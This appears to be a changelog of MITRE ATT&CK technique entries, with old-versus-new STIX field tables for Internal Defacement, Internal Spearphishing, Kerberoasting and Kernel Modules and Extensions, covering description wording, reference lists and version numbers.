| An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware) | An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-29 22:57:04.784000+00:00 | 2022-07-28 18:55:35.988000+00:00 |
| description | An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware) | An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware) |
| external_references[1]['source_name'] | Novetta Blockbuster | Novetta Blockbuster Destructive Malware |
| external_references[1]['description'] | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016. | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016. |
| external_references[1]['url'] | https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf | https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf |
| external_references[2]['source_name'] | Novetta Blockbuster Destructive Malware | Novetta Blockbuster |
| external_references[2]['description'] | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016. | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016. |
| external_references[2]['url'] | https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf | https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Network Traffic: Network Traffic Content |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Network Traffic: Network Traffic Content |
| Old Description | New Description |
|---|---|
| Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged attack where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017) Adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces. There have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the attack and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.) | Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged campaign where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017) Adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces. There have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the campaign and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-14 14:32:14.273000+00:00 | 2022-03-08 21:29:30.249000+00:00 |
| description | Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged attack where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017) Adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces. There have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the attack and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.) | Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged campaign where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017) Adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces. There have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the campaign and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.) |
| x_mitre_detection | Network intrusion detection systems and email gateways usually do not scan internal email, but an organization can leverage the journaling-based solution which sends a copy of emails to a security service for offline analysis or incorporate service-integrated solutions using on-premise or API-based integrations to help detect internal spearphishing attacks.(Citation: Trend Micro When Phishing Starts from the Inside 2017) | Network intrusion detection systems and email gateways usually do not scan internal email, but an organization can leverage the journaling-based solution which sends a copy of emails to a security service for offline analysis or incorporate service-integrated solutions using on-premise or API-based integrations to help detect internal spearphishing campaigns.(Citation: Trend Micro When Phishing Starts from the Inside 2017) |
| x_mitre_version | 1.1 | 1.2 |
| Old Description | New Description |
|---|---|
| Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.mitre.org/techniques/T1110).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016) Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016) This same attack could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015) Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014) | Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.mitre.org/techniques/T1110).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016) Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016) This same behavior could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015) Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-20 19:30:10.687000+00:00 | 2022-03-08 21:52:42.405000+00:00 |
| description | Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.mitre.org/techniques/T1110).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016) Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016) This same attack could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015) Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014) | Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.mitre.org/techniques/T1110).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016) Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016) This same behavior could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015) Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014) |
| x_mitre_version | 1.1 | 1.2 |
| Old Description | New Description |
|---|---|
Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming) When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview) Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands. Since macOS Catalina 10.15, kernel extensions have been deprecated on macOS systems.(Citation: Apple Kernel Extension Deprecation) Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap) |
Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload and kextunload commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap) |
New Mitigations:
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-19 04:03:46.357000+00:00 | 2022-04-20 18:53:39.406000+00:00 |
| description | Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming)
When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview)
Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands. Since macOS Catalina 10.15, kernel extensions have been deprecated on macOS systems.(Citation: Apple Kernel Extension Deprecation)
Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap) |
Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload and kextunload commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap) |
| external_references[1]['source_name'] | Linux Kernel Programming | Apple Developer Configuration Profile |
| external_references[1]['description'] | Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel Module Programming Guide. Retrieved April 6, 2018. | Apple. (2019, May 3). Configuration Profile Reference. Retrieved September 23, 2021. |
| external_references[1]['url'] | https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf | https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf |
| external_references[2]['source_name'] | Linux Kernel Module Programming Guide | Apple Kernel Extension Deprecation |
| external_references[2]['description'] | Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs. Retrieved April 6, 2018. | Apple. (n.d.). Deprecated Kernel Extensions and System Extension Alternatives. Retrieved November 4, 2020. |
| external_references[2]['url'] | http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html | https://developer.apple.com/support/kernel-extensions/ |
| external_references[3]['source_name'] | iDefense Rootkit Overview | System and kernel extensions in macOS |
| external_references[3]['description'] | Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved April 6, 2018. | Apple. (n.d.). System and kernel extensions in macOS. Retrieved March 31, 2022. |
| external_references[3]['url'] | http://www.megasecurity.org/papers/Rootkits.pdf | https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web |
| external_references[4]['source_name'] | Apple Kernel Extension Deprecation | GitHub Reptile |
| external_references[4]['description'] | Apple. (n.d.). Deprecated Kernel Extensions and System Extension Alternatives. Retrieved November 4, 2020. | Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved April 9, 2018. |
| external_references[4]['url'] | https://developer.apple.com/support/kernel-extensions/ | https://github.com/f0rb1dd3n/Reptile |
| external_references[6]['source_name'] | CrowdStrike Linux Rootkit | iDefense Rootkit Overview |
| external_references[6]['description'] | Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. Retrieved December 21, 2017. | Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved April 6, 2018. |
| external_references[6]['url'] | https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/ | http://www.megasecurity.org/papers/Rootkits.pdf |
| external_references[7]['source_name'] | GitHub Reptile | Linux Loadable Kernel Module Insert and Remove LKMs |
| external_references[7]['description'] | Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved April 9, 2018. | Henderson, B. (2006, September 24). How To Insert And Remove LKMs. Retrieved April 9, 2018. |
| external_references[7]['url'] | https://github.com/f0rb1dd3n/Reptile | http://tldp.org/HOWTO/Module-HOWTO/x197.html |
| external_references[8]['source_name'] | GitHub Diamorphine | CrowdStrike Linux Rootkit |
| external_references[8]['description'] | Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018. | Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. Retrieved December 21, 2017. |
| external_references[8]['url'] | https://github.com/m0nad/Diamorphine | https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/ |
| external_references[9]['source_name'] | RSAC 2015 San Francisco Patrick Wardle | GitHub Diamorphine |
| external_references[9]['description'] | Wardle, P. (2015, April). Malware Persistence on OS X Yosemite. Retrieved April 6, 2018. | Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018. |
| external_references[9]['url'] | https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf | https://github.com/m0nad/Diamorphine |
| external_references[10]['source_name'] | Synack Secure Kernel Extension Broken | Securelist Ventir |
| external_references[10]['description'] | Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel Extension Loading’ is Broken. Retrieved April 6, 2018. | Mikhail, K. (2014, October 16). The Ventir Trojan: assemble your MacOS spy. Retrieved April 6, 2018. |
| external_references[10]['url'] | https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/ | https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/ |
| external_references[11]['source_name'] | Securelist Ventir | User Approved Kernel Extension Pike’s |
| external_references[11]['description'] | Mikhail, K. (2014, October 16). The Ventir Trojan: assemble your MacOS spy. Retrieved April 6, 2018. | Pikeralpha. (2017, August 29). User Approved Kernel Extension Loading…. Retrieved September 23, 2021. |
| external_references[11]['url'] | https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/ | https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/ |
| external_references[12]['source_name'] | Trend Micro Skidmap | Linux Kernel Module Programming Guide |
| external_references[12]['description'] | Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020. | Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs. Retrieved April 6, 2018. |
| external_references[12]['url'] | https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/ | http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html |
| external_references[13]['source_name'] | Linux Loadable Kernel Module Insert and Remove LKMs | Linux Kernel Programming |
| external_references[13]['description'] | Henderson, B. (2006, September 24). How To Insert And Remove LKMs. Retrieved April 9, 2018. | Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel Module Programming Guide. Retrieved April 6, 2018. |
| external_references[13]['url'] | http://tldp.org/HOWTO/Module-HOWTO/x197.html | https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf |
| external_references[14]['source_name'] | Wikipedia Loadable Kernel Module | Trend Micro Skidmap |
| external_references[14]['description'] | Wikipedia. (2018, March 17). Loadable kernel module. Retrieved April 9, 2018. | Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020. |
| external_references[14]['url'] | https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux | https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/ |
| external_references[15]['source_name'] | User Approved Kernel Extension Pike’s | Purves Kextpocalypse 2 |
| external_references[15]['description'] | Pikeralpha. (2017, August 29). User Approved Kernel Extension Loading…. Retrieved September 23, 2021. | Richard Purves. (2017, November 9). MDM and the Kextpocalypse . Retrieved September 23, 2021. |
| external_references[15]['url'] | https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/ | https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/ |
| external_references[16]['source_name'] | Purves Kextpocalypse 2 | RSAC 2015 San Francisco Patrick Wardle |
| external_references[16]['description'] | Richard Purves. (2017, November 9). MDM and the Kextpocalypse . Retrieved September 23, 2021. | Wardle, P. (2015, April). Malware Persistence on OS X Yosemite. Retrieved April 6, 2018. |
